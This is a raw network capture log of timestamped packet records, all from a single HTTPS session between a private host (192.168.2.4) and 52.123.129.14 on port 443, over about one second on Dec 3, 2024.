                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.603477001 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.603482962 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.605215073 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.605272055 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.605283976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.607979059 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.608037949 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.608043909 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.610435009 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.610491991 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.610500097 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.612571955 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.612627029 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.612632990 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.614629984 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.614689112 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.614695072 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.621666908 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.621737003 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.621742964 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.673754930 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.783606052 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.783613920 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.783678055 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.783695936 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.786036015 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.786042929 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.786077023 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.786086082 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.786112070 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.789356947 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.789386034 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.789407969 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.789416075 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.789436102 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.791098118 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.791146040 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.791155100 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.794523001 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.794584036 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.794595003 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.796688080 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.796758890 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.796770096 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.799999952 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.800055027 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.800069094 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.802294016 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.802362919 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.802372932 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.805461884 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.805552006 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.805567026 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.807900906 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.807972908 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.807981014 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.810774088 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.810857058 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.810867071 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.813936949 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.814012051 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.814022064 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.817056894 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.817114115 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.817123890 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.820101976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.820175886 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.820184946 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.823254108 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.823343992 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.823352098 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.825625896 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.825687885 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.825695038 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.870321989 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.984786034 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.984795094 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.984858036 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.984869957 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.987941027 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.987974882 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.988002062 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.988008976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.988029957 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.990777969 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.990837097 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.990845919 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.994450092 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.994503975 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.994513035 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.996041059 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.996114969 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.996124029 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.999174118 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.999255896 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:28.999264956 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.003020048 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.003093004 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.003103018 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.005378008 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.005475044 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.005482912 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.007760048 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.007848978 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.007857084 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.010941982 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.011049032 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.011058092 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.013952017 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.014020920 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.014033079 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.017101049 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.017163992 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.017172098 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.019519091 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.019606113 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.019614935 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.022634983 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.022701979 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.022708893 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.025677919 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.025791883 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.025800943 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.028776884 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.028899908 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.028908014 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.078526974 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.188378096 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.188388109 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.188479900 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.188500881 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.192931890 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.192939997 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.193018913 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.193027020 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.194984913 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.195034027 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.195043087 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.195045948 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.195118904 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.197451115 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.197458982 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.197531939 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.197540045 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.197767019 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.199691057 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.199764013 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.199771881 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.202073097 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.202151060 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.202159882 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.205254078 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.205332041 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.205339909 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.208460093 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.208595037 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.208604097 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.209947109 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.210015059 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.210025072 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.212143898 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.212263107 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.212270021 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.215347052 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.215444088 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.215451002 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.217616081 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.217680931 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.217689991 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.220247984 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.220340967 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.220350027 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.223098040 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.223206043 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.223213911 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.225436926 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.225514889 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.225523949 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.231378078 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.231470108 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.231477976 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.273444891 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.389580965 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.389590025 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.389683962 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.389695883 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.392800093 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.392838001 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.392870903 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.392877102 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.392911911 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.394505024 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.394577980 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.394586086 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.397367954 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.397423029 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.397432089 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.400259972 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.400392056 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.400399923 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.403007030 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.403075933 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.403084040 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.405213118 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.405278921 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.405287027 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.407555103 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.407614946 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.407623053 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.410826921 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.410891056 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.410898924 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.413063049 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.413125038 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.413132906 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.415482044 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.415584087 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.415592909 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.417797089 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.417895079 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.417901993 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.421013117 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.421099901 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.421108961 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.423458099 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.423523903 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.423532963 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.425554037 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.425647974 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.425657034 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.433753967 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.433839083 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.433846951 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.476835966 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.590850115 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.590857029 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.590965033 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.591001987 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.593357086 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.593436003 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.593446016 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.593450069 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.593532085 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.595518112 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.595525980 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.595590115 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.595606089 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.595664978 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.597543955 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.597618103 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.597625971 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.600347042 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.600423098 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.600431919 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.602787018 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.602921963 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.602936983 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.604597092 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.604681015 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.604688883 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.607376099 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.607456923 CET49802443192.168.2.452.123.129.14
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.607466936 CET4434980252.123.129.14192.168.2.4
                                                                                                                                                                                                                                                                            Dec 3, 2024 18:59:29.609832048 CET4434980252.123.129.14192.168.2.4
